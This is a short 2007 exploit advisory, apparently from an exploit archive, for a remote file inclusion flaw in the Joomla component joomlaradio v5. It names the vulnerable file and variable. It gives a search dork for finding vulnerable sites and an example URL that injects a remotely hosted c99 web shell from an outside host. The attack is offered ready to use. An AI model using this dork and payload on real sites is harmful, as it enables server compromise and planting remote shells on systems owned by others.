Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability
# Published : 2007-09-13
# Author : Morgan
# Previous Title : KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability
# Next Title : GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability

###########################
# Joomla Radio v5 Component RFI           #
###########################

Bug in :
administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php
Variable : $mosConfig_live_site

Download : http://www.joomlaos.de/option,com_remository/Itemid,41/func,fileinfo/id,2661.html

Dork: inurl:"com_joomlaradiov5"

Example:

www.site.com/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://scriptkiddie.com/c99haxor.txt?


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# www.Syue.com [2007-09-13]